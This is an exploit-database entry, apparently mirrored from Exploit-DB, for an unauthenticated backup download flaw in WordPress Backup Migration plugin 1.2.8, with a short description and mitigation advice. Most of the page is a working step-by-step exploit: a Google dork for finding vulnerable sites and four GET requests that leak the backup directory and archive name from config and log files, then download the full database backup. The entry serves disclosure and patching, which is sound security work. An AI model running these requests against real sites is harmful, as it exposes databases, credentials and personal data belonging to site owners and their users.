header-logo
Suggest Exploit
vendor:
Backup Migration Plugin
by:
Wadeek
6.5
CVSS
MEDIUM
Unauthenticated Database Backup
269
CWE
Product Name: Backup Migration Plugin
Affected Version From: 1.2.2008
Affected Version To: 1.2.2008
Patch Exists: YES
Related CWE:
CPE: a:backup_migration:backup_migration:1.2.8
Metasploit:
Other Scripts:
Platforms Tested: WordPress 6.2
2023

WordPress Plugin Backup Migration 1.2.8 – Unauthenticated Database Backup

The WordPress Plugin Backup Migration 1.2.8 allows unauthenticated users to access and download the database backup files. By exploiting this vulnerability, an attacker can gain unauthorized access to sensitive data.

Mitigation:

Update to the latest version of the plugin (1.2.9 or higher) which fixes this vulnerability. Restrict access to backup directories and files to authenticated users only.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup
# Google Dork: intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/")
# Date: 2023-05-10
# Exploit Author: Wadeek
# Vendor Homepage: https://backupbliss.com/
# Software Link: https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip
# Version: 1.2.8
# Tested on: WordPress 6.2

1) Get the version of the plugin.

=> GET /wp-content/plugins/backup-backup/readme.txt
--------------------------------------------------------------------------
Stable tag: 1.2.8
--------------------------------------------------------------------------

2) Get the name of the backup directory.

=> GET /wp-content/backup-migration/config.json
--------------------------------------------------------------------------
{
[...],
"STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",
[...],
"OTHER:EMAIL":"admin@email.com"
}
--------------------------------------------------------------------------

3) Get the name of the archive containing the backups.

=> GET /wp-content/backup-migration/complete_logs.log
--------------------------------------------------------------------------
BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
--------------------------------------------------------------------------

4) Build the path for the download.

=> GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip

Navigation

Suggest Exploit

Services By CQR